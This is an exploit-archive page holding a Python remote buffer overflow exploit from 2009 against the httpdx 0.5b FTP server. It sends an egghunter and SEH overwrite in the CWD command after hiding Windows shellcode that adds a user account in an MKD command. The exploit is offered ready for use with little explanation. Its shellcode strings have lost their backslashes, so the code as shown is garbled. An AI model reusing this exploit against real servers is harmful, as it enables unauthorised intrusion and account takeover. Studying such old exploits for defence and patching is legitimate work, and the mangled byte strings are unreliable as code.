httpdx <= 0.5b FTP Server (CWD) Remote BOF Exploit (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : httpdx <= 0.5b FTP Server (CWD) Remote BOF Exploit (SEH)
# Published : 2009-05-19
# Author : His0k4
# Previous Title : Mac OS X Java applet Remote Deserialization Remote PoC (updated)
# Next Title : AOL IWinAmpActiveX Class ConvertFile() Remote BOF Exploit

#!/usr/bin/python
#[*] Usage : httpdx_cwd.py [target_ip] user pass 
#[*] Example : httpdx_cwd.py 192.168.1.3 ftp 123
# Stack encouraged me to exploit this bug , so thx brotha
# _  _   _         __    _     _ _  
#| || | (_)  ___  /    | |__ | | | 
#| __ | | | (_-< | () | | / / |_  _|
#|_||_| |_| /__/  __/  |__   |_| 
#
#[*] Bug     : httpdx <= 0.5b FTP Server (CWD) Remote BOF Exploit (SEH)
#[*] Refer :  sico2819
#[*] Tested on :    Xp sp3 (EN)(VB)
#[*] Exploited by : His0k4
#[*] Greetings :    All friends & muslims HaCkErs (DZ),Algerians Elites,snakespc.com
#[*] Serra7 Merra7 koulchi mderra7 :p

#[x] Note : I used the case when idm is installed because its dll (idmmbc.dll) is loaded with httpdx.

import socket,sys,struct

def banner():
        print "nhttpdx <= 0.5b FTP Server (CWD) Remote Buffer Overflow Exploit.n"
        print "By: His0k4n"
 
if len(sys.argv)!=4:
        banner()
        print "Usage: %s <ip> <user> <pass>" %sys.argv[0]
        sys.exit(0)

# skape's egghunter shellcode
shellunt=(
"x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74"
"xefxb8x44x7Ax32x37x8bxfaxafx75xeaxafx75xe7xffxe7")

# win32_adduser -  PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"x44x7Ax32x37x44x7Ax32x37x29xc9x83xe9xcdxd9xeexd9"
"x74x24xf4x5bx81x73x13x05x16xf2x06x83xebxfcxe2xf4"
"xf9xfexb6x06x05x16x79x43x39x9dx8ex03x7dx17x1dx8d"
"x4ax0ex79x59x25x17x19x4fx8ex22x79x07xebx27x32x9f"
"xa9x92x32x72x02xd7x38x0bx04xd4x19xf2x3ex42xd6x02"
"x70xf3x79x59x21x17x19x60x8ex1axb9x8dx5ax0axf3xed"
"x8ex0ax79x07xeex9fxaex22x01xd5xc3xc6x61x9dxb2x36"
"x80xd6x8ax0ax8ex56xfex8dx75x0ax5fx8dx6dx1ex19x0f"
"x8ex96x42x06x05x16x79x6ex39x49xc3xf0x65x40x7bxfe"
"x86xd6x89x56x6dxe6x78x02x5ax7ex6axf8x8fx18xa5xf9"
"xe2x75x9fx62x2bx73x8ax63x25x39x91x26x6bx73x86x26"
"x70x65x97x74x25x72x88x26x37x21xd2x29x44x52xb6x26"
"x23x30xd2x68x60x62xd2x6ax6ax75x93x6ax62x64x9dx73"
"x75x36xb3x62x68x7fx9cx6fx76x62x80x67x71x79x80x75"
"x25x72x88x26x2ax57xb6x42x05x16xf2x06")

payload = 'x41'*26
payload += shellunt
payload += 'xEBxDEx90x90'
payload += 'x87x23x02x10'
payload += 'x44'*900

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
	s.connect((sys.argv[1],21))
except:
	print "Can't connect to server!n"
	sys.exit(0)

s.recv(1024)
s.send('USER '+sys.argv[2]+'rn')
s.recv(1024)
s.send('PASS '+sys.argv[3]+'rn')
s.recv(1024)
s.send('MKD '+shellcode+'rn') # i placed the shellcode in the MKD command ;)
s.recv(1024)
s.send('CWD '+payload+'rn')
print ("Egghunter is hunting...;)")
raw_input("[+] Shellcode will be executed when httpdx get closed")
s.close()

# www.Syue.com [2009-05-19]